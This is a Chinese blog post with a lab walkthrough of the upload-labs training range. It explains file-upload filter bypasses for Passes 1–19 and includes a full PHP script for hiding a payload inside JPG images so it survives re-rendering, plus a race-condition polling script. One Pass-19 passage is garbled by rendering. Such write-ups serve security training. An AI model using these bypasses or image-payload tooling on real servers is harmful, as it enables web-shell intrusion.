upload-labs靶场

最新推荐文章于 2025-05-26 15:38:23 发布
原创 最新推荐文章于 2025-05-26 15:38:23 发布 · 1.1k 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#笔记 #php

文章详细描述了逐步破解Web应用程序文件上传限制的方法,包括前端验证绕过、内容类型篡改、后缀名欺骗、文件名处理、利用getimagesize和exif_imagetype函数构造虚假图片等技巧,以及条件竞争和二次渲染漏洞利用策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞初步认识

漏洞初步介绍可见另外一篇文章漏洞的初步认识

Pass-01

查看源码,发现只能上传三个文件类型,我们上传其它文件来看它的回显在这里插入图片描述

用弹窗进行错误提示的话证明是运用了前端验证,我们只需F12查看,将前端验证的部分进行添加即可
在这里插入图片描述

Pass-02

上传文件,查看回显。查看代码,发现与content-type相关的,只要改content-type的类型即可,上传一个一句话木马图片,在burp中修改为php后缀
在这里插入图片描述
在这里插入图片描述
最后上传即可

Pass-03

查看源代码,发现有限制,我们只需上传php的其它后缀名即可在这里插入图片描述
在这里插入图片描述

Pass-04

查看代码发现上题的解决方法不能用了,限制太多了在这里插入图片描述
通过查看wp,可以发现使用.htaccess文件进行绕过。
在这里插入图片描述

Pass-05

查看代码发现,并未对大写进行限制对后缀名进行大小写混合,将’.php’改写为‘.Php’,以此绕过黑名单
在这里插入图片描述

Pass-06

从源码可以看出没有了删除空格,所以可以在文件后缀名末尾加空格,windos在存储时会自动去处空格,在检测时可以绕过限制。
在这里插入图片描述

Pass-07

源码中没有删除文件末尾点的代码,所以可以在文件后缀名后加点,‘.php’改写为’.php.',并且和06一样,Windows存储时也会自动去除后缀名末尾的点,在检测时可绕过黑名单。
在这里插入图片描述

Pass-08

发现缺少的限制是::$DATA类型在这里插入图片描述

在这里插入图片描述

Pass-09

查看代码,发现该题并未缺少限制,首先会去处文件名末尾的点,然后首尾去空。所以我们可用空格来充当占位符号,.php’改写为.php. .
在这里插入图片描述

Pass-10

注意这句代码,这句代码的意思是,所有与黑名单相同的后缀名都会被替换为空。
在这里插入图片描述
所以我们可以用pphphp来绕过

Pass-11~12

查看源码两道题都是发现是基于post的save_path,如何判断是get还是post,抓包查看save_path在什么位置,在上面的url的位置上就是get(11题),12题的情况就是post,均使用00截断。
在这里插入图片描述
11题,传参方式为GET型,且根据提示发现,传参路径可控,将文件改名为phpinfo.jpg后,抓包修改savepath,存储后存储路径会和文件名称合并,最终形成文件名为’phpinfo.php%00phpinfo.jpg’。
在这里插入图片描述
12题方法一样,使用0x00

Pass-13

要使用图片一句话木马,我们先去学习如何制作。具体操作

再上传即可

Pass-14

发现getimagesize()函数,我们只要在文件内容的起始位置加上一个GIF89a即可,这样我们的文件就会被认为是一个图片,php的getimagesize()函数也检测不出来我们构造的这个“虚假”的图片是无效的。在这里插入图片描述
最后使用蚁剑连接,继续利用文件包含的漏洞进行利用该上传的一句话木马即可

Pass-15

发现要使用exif_imagetype(),查阅资料发现exif_imagetype()读取一个图像的第一个字节并检查其后缀名。
返回值与getimage()函数返回的索引2相同,但是速度比getimage快得多但需要开启php_exif模块
在这里插入图片描述
在这里插入图片描述
其余方法和14一样最后使用蚁剑连接,继续利用文件包含的漏洞进行利用该上传的一句话木马即可

Pass-16(不是很懂)

要使用二次渲染

1、配合文件包含漏洞:
  将一句话木马插入到网站二次处理后的图片中,也就是把一句话插入图片在二次渲染后会保留的那部分数据里,确保不会在二次处理时删除掉。这样二次渲染后的图片中就存在了一句话,在配合文件包含漏洞获取webshell。

2、可以配合条件竞争:
  这里二次渲染的逻辑存在漏洞,先将文件上传,之后再判断,符合就保存,不符合删除,可利用条件竞争来进行爆破上传

原文链接:https://blog.youkuaiyun.com/weixin_45588247/article/details/119177948

在这里插入图片描述
我们这里使用JPG绕过
先创建一个脚本,用于生成绕过二次渲染的图片马

<?php
    /*

    The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().
    It is necessary that the size and quality of the initial image are the same as those of the processed image.

    1) Upload an arbitrary image via secured files upload script
    2) Save the processed image and launch:
    jpg_payload.php <jpg_name.jpg>

    In case of successful injection you will get a specially crafted image, which should be uploaded again.

    Since the most straightforward injection method is used, the following problems can occur:
    1) After the second processing the injected data may become partially corrupted.
    2) The jpg_payload.php script outputs "Something's wrong".
    If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.

    Sergey Bobrov @Black2Fan.

    See also:
    https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

    */

    $miniPayload = "<?=phpinfo();?>";


    if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
        die('php-gd is not installed');
    }

    if(!isset($argv[1])) {
        die('php jpg_payload.php <jpg_name.jpg>');
    }

    set_error_handler("custom_error_handler");

    for($pad = 0; $pad < 1024; $pad++) {
        $nullbytePayloadSize = $pad;
        $dis = new DataInputStream($argv[1]);
        $outStream = file_get_contents($argv[1]);
        $extraBytes = 0;
        $correctImage = TRUE;

        if($dis->readShort() != 0xFFD8) {
            die('Incorrect SOI marker');
        }

        while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
            $marker = $dis->readByte();
            $size = $dis->readShort() - 2;
            $dis->skip($size);
            if($marker === 0xDA) {
                $startPos = $dis->seek();
                $outStreamTmp = 
                    substr($outStream, 0, $startPos) . 
                    $miniPayload . 
                    str_repeat("\0",$nullbytePayloadSize) . 
                    substr($outStream, $startPos);
                checkImage('_'.$argv[1], $outStreamTmp, TRUE);
                if($extraBytes !== 0) {
                    while((!$dis->eof())) {
                        if($dis->readByte() === 0xFF) {
                            if($dis->readByte !== 0x00) {
                                break;
                            }
                        }
                    }
                    $stopPos = $dis->seek() - 2;
                    $imageStreamSize = $stopPos - $startPos;
                    $outStream = 
                        substr($outStream, 0, $startPos) . 
                        $miniPayload . 
                        substr(
                            str_repeat("\0",$nullbytePayloadSize).
                                substr($outStream, $startPos, $imageStreamSize),
                            0,
                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) . 
                                substr($outStream, $stopPos);
                } elseif($correctImage) {
                    $outStream = $outStreamTmp;
                } else {
                    break;
                }
                if(checkImage('payload_'.$argv[1], $outStream)) {
                    die('Success!');
                } else {
                    break;
                }
            }
        }
    }
    unlink('payload_'.$argv[1]);
    die('Something\'s wrong');

    function checkImage($filename, $data, $unlink = FALSE) {
        global $correctImage;
        file_put_contents($filename, $data);
        $correctImage = TRUE;
        imagecreatefromjpeg($filename);
        if($unlink)
            unlink($filename);
        return $correctImage;
    }

    function custom_error_handler($errno, $errstr, $errfile, $errline) {
        global $extraBytes, $correctImage;
        $correctImage = FALSE;
        if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
            if(isset($m[1])) {
                $extraBytes = (int)$m[1];
            }
        }
    }

    class DataInputStream {
        private $binData;
        private $order;
        private $size;

        public function __construct($filename, $order = false, $fromString = false) {
            $this->binData = '';
            $this->order = $order;
            if(!$fromString) {
                if(!file_exists($filename) || !is_file($filename))
                    die('File not exists ['.$filename.']');
                $this->binData = file_get_contents($filename);
            } else {
                $this->binData = $filename;
            }
            $this->size = strlen($this->binData);
        }

        public function seek() {
            return ($this->size - strlen($this->binData));
        }

        public function skip($skip) {
            $this->binData = substr($this->binData, $skip);
        }

        public function readByte() {
            if($this->eof()) {
                die('End Of File');
            }
            $byte = substr($this->binData, 0, 1);
            $this->binData = substr($this->binData, 1);
            return ord($byte);
        }

        public function readShort() {
            if(strlen($this->binData) < 2) {
                die('End Of File');
            }
            $short = substr($this->binData, 0, 2);
            $this->binData = substr($this->binData, 2);
            if($this->order) {
                $short = (ord($short[1]) << 8) + ord($short[0]);
            } else {
                $short = (ord($short[0]) << 8) + ord($short[1]);
            }
            return $short;
        }

        public function eof() {
            return !$this->binData||(strlen($this->binData) === 0);
        }
    }

在这里插入图片描述
图片🐎用010打开,就可以看到插入的php代码在这里插入图片描述
上传后,将图片下载,用010查看是不是被过滤,发现蚂蚁被过滤即可

Pass-17(不是很懂)

通过提示发现跟以前的都不一样,查看代码
在这里插入图片描述
本题看不懂去查阅wp发现

如果是jpg、png、gif中的一种,就将文件进行重命名。如果不符合的话,unlink()函数就会删除该文件。这么看来如果我们还是上传一个图片马的话,网站依旧存在文件包含漏洞我们还是可以进行利用。但是如果没有文件包含漏洞的话,我们就只能上传一个php木马来解析运行了。

那还怎么搞?上传上去就被删除了,我还怎么去访问啊。

不慌不慌,要知道代码执行的过程是需要耗费时间的。如果我们能在上传的一句话被删除之前访问不就成了。这个也就叫做条件竞争上传绕过。

我们可以利用burp多线程发包,然后不断在浏览器访问我们的webshell,会有一瞬间的访问成功。 明。
php文件通过burp一直不停的重放,然后再写python脚本去不停的访问我们上传的这个文件直到成功访问为止

原文链接:https://blog.youkuaiyun.com/weixin_47598409/article/details/115050869

import requests
url = "http://xxx.xxx.xxx.xxx/upload-labs/upload/zoe.php"
while True:
    html = requests.get(url)
    if html.status_code == 200:
        print("OK")
        break

Pass-18(不是很懂)

查看提示在这里插入图片描述
发现还是审计代码,不是很懂,看大佬的wp了,发现代码没有对上传的文件做判断,只对用户输入的文件名做判断。后缀名黑名单,上传的文件名用户可控,黑名单用于用户输入的文件后缀名进行判断。move_uploaded_file()还有这么一个特性,会忽略掉文件末尾的 /.
先准备PHP一句话木马,并把后缀名改为PNG再上传
然后用BP来抓包,修改为php,再放包,然后复制图片地址,用蚁剑连接查看

Pass-19(不是很懂)

查看代码,会发现也不是很懂,看大佬的wp后,发现这关的主要过程

验证过程:
–> 验证上传路径是否存在
–> 验证[‘upload_file’]的content-type是否合法(可以抓包修改)
–> 判断POST参数是否为空定义 f i l e 变量(关键:构造数组绕过下一步的判断) − − > 判断 f i l e 不是数组则使用 e x p l o d e ( ′ . ′ , s t r t o l o w e r ( file变量(关键:构造数组绕过下一步的判断) -->判断file不是数组则使用explode('.', strtolower( file变量(关键:构造数组绕过下一步的判断)>判断file不是数组则使用explode(.,strtolower(file))对file进行切割,将file变为一个数组
–> 判断数组最后一个元素是否合法
–> 数组第一位和 f i l e [ c o u n t ( file[count( file[count(file) - 1]进行拼接,产生保存文件名file_name
–> 上传文件

首先准备PHP一句话木马
然后上传用BP来拦截并改包在这里插入图片描述
复制图片地址,用蚁剑进行连接即可。

upload-labs·文件上传(靶场攻略)
duoba_an的博客
03-19 9669
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。文件上传漏洞成因: 具备上传文件功能的Web等应用,未对用户选择上传的文件进行校验,使得非法 用户可通过上传可执行脚本而获取应用的控制权限。
文件上传漏洞及upload靶场详细思路wp
2301_77004573的博客
07-26 1269
1.先判断存不存在客户端防护(js检查),有的话之后所有步骤都需注意不能直接传php文件2.如果把做题流程比作一棵树,那么其中的主体方法就是树干,细节上的附加绕过就是树叶主体的做题方法(树干)有:解析漏洞,包含漏洞,00截断,条件竞争,二次渲染细节的树叶有:特殊后缀上传,大小写绕过," . / 空格"绕过,::$DATA绕过,双写绕过,MIME绕过,GIF89a文件头绕过而在做题时就是要以树干为主体,为树干补充好树叶,最后达成完美绕过。
upload-labs靶场搭建+实战(纯小白向)
A_fish_like_sing的博客
05-26 1368
先下载phpstudy,往下翻到立即下载,下载64位后解压(路径最好不要有中文)双击exe文件下载,下载成功后打开,套件启动apache和ftp就行,然后下载靶场文件压缩包​这里有说道,下载压缩包后解压到pupstudy_pro路径中WWW路径下,解压出来的名字可能是upload-labs-master的话,需要修改一下文件名,让访问网址中的文件名和WWW路径下的对照一致,否则的话就会404,这里我发一下我的​​。
Upload-labs 1-20关靶场通关攻略(全网最全最完整)
热门推荐
dragon的博客
03-15 1万+
在github上找upload-labs-0.1环境,部署在小皮面板上也可以直接下载他的集成的环境。 Sethandler将该目录及子目录的所有文件均映射为php文件类型。 Addhandler使用 php5-script 处理器来解析所匹配到的文件。 AddType将特定扩展名文件映射为php文件类型。 简单来说就是,可以将我们所的文件都解析成php或者是特定的文件解析为phpPHP 在处理文件名或路径时,如果遇到 URL 编码的 %00,它会被解释为一个空字节(ASCII 值为 0)
最新upload-labs文件上传漏洞靶场搭建安装,upload-labs Pass01-Pass20 二十关详解,靶场源码详解,upload-labs第一关到第二十关详解,一句话木马详细介绍
2302_80946742的博客
04-16 6496
在开始打靶场之前,我们先来介绍一下一句话木马。一句话木马(One-liner Trojan 或 Webshell)是一种常见的网络安全攻击工具,通常用于Web服务器的非法控制。它称为“一句话”,因为攻击者只需在目标服务器上的一个可访问的Web页面中植入一小段代码,就可以实现对服务器的远程控制。这种木马通常以PHP、ASP、JSP等服务端脚本语言的形式出现,因为这些语言能够在服务器上执行。一句话木马的代码很简短,但功能却非常强大,能够接收远程命令并在服务器上执行这些命令。?
upload-labs靶场通关详解:第2关 MIME类型绕过
CL1799438883的博客
05-07 347
'upload_file':此为表单中文件上传字段的名称。在 HTML 表单里,文件上传的输入框一般是使用 <input type="file" name="upload_file">这样的形式,其中name属性的值就是'upload_file'。打开bp工具,上传php文件,抓取数据包,content-type就是文件类型,将其修改为允许上传的类型,如image/jpeg等。数组里的一个索引,代表上传文件的 MIME 类型。到这里可以得出思路,尝试通过bp抓包,修改文件的MIME类型进行验证绕过。
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础...
upload-labs靶场练习-持续更新中
09-09
upload-labs靶场练习便是为学习和提升对文件上传漏洞的理解和防御能力而设,其持续更新中包含多种攻击场景和防御策略,让练习者了解如何在不同的限制条件下上传恶意文件,并教会他们如何通过各种手段绕过这些限制。...
安装upload-labs
10-22
在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 安装upload-labs的步骤 1. 下载靶场文件:首先,您需要下载upload-labs靶场文件,可以从官方网站或其他可靠的渠道下载。...
upload-labs-master【文件上传靶场
04-05
"upload-labs-master【文件上传靶场】" 是一个针对文件上传功能安全性的测试平台,主要目的是帮助开发者、安全人员以及爱好者检验和学习文件上传漏洞的防范措施。在这个靶场中,你可以模拟不同的攻击手段,了解如何...
upload-labs wp
m0_62805300的博客
04-10 1311
pass-01 右键查看网页源码 发现是用js判断的直接禁用js上传一句话木马 上传成功 pass-02 之前的禁用js行不通 将一句话木马文件后缀改成png抓个包再改包试试 上传成功 这个应该是判断的content-type是否为图片类型 pass-03 查看源码 用的黑名单过滤 只过滤了asp aspx php jsp 去掉注释符使得phtml后缀也能被当作php解析 ...
upload-labs自通关记录2
qq_52321903的博客
03-27 155
(此方法仅适用于windows操作系统)查看源码,这次又将::$DATA限制回来了,且之前的限制都汇集在一起了,但是这关可以应用Pass-05和Pass-08所用到的,". 空格 ." 的方法进行绕过,这里的原理是:deldot()函数从后向前检测,当检测到末尾的第一个点时会继续它的检测,但是遇到空格会停下来,因此方法同理Pass-05的方法二,这里便不做测试了。这关我按照惯例先试试上传一句话木马的时候,发现居然上传成功了,但是检查发现,后缀名php消失了,“.”还在,查看源码,发现是这个函数没见过。
【封神台】upload-labs wp
孤桜懶契
07-24 420
前言 掌控安全里面的靶场upload-labs,练练手! 环境:http://59.63.200.79:8016/ pass-01 function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; }
upload-labs
zl0_00_0的博客
02-21 442
源码解释document.getElementsByName ()通过元素名称获取文档的第一个元素,这里获取的文档的名称是uoload_file这一表单元素(收集用户输入的信息内容)file==null的意思是文件为空,这里通过判断真假值来判断用户是否选择了文件,如果为真值即为空的话就提示用户上传文件将一些扩展名定义为allow_ext,然后用file.substring(file.lastIndexOf("."))获取文件扩展名,意思是从.这个字符开始截取到字符串末尾以得到扩张名。
upload-labs 安装教程&&第一关
m0_52701599的博客
02-24 1861
upload-labs 安装教程&&第一关
upload-labs--wp(21关)
1stPeak's Blog
03-20 3273
第一题 不多说,直接上传 出现上图所示,如果你bp开启着抓包,你会发现,并没有抓到任何数据包,就被拦截了,这说明是前端验证没禁用js或修改前端代码即可 随后可以访问xx.php,url利用或C刀/蚁剑皆可 最后加个源码分析吧: function checkFile() { //定义一个名为checkFile的函数 var file = document.getElementsB...
Upload-labs
m0_68956519的博客
02-15 1257
第一段是function的意思是函数,定义了一个名为function的函数第二行进行了缩进,所以以下部分都是函数内容var的意思是把后面的变量限定为当前函数的变量,而不是全局变量GetElementByName是一种获取元素的方法document是一个全局对象,代表整个HTML或XML文档,用来访问和修改元素HMTL元素之后是一个if的条件判断,检查file变量是否为空,如果为空就会输出请选择要上传的文件并结束函数,返回错误值然后在定义了一个allow_ext和ext_name。
upload-labs靶场搭建linux
最新发布
07-03
在Linux系统上搭建upload-labs靶场环境,可以使用多种方式实现。以下是基于容器技术(如Podman或Docker)和传统PHP环境的两种主要方法。 ### 使用Podman安装upload-labs 如果已经安装了Podman,则可以直接拉取相关...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值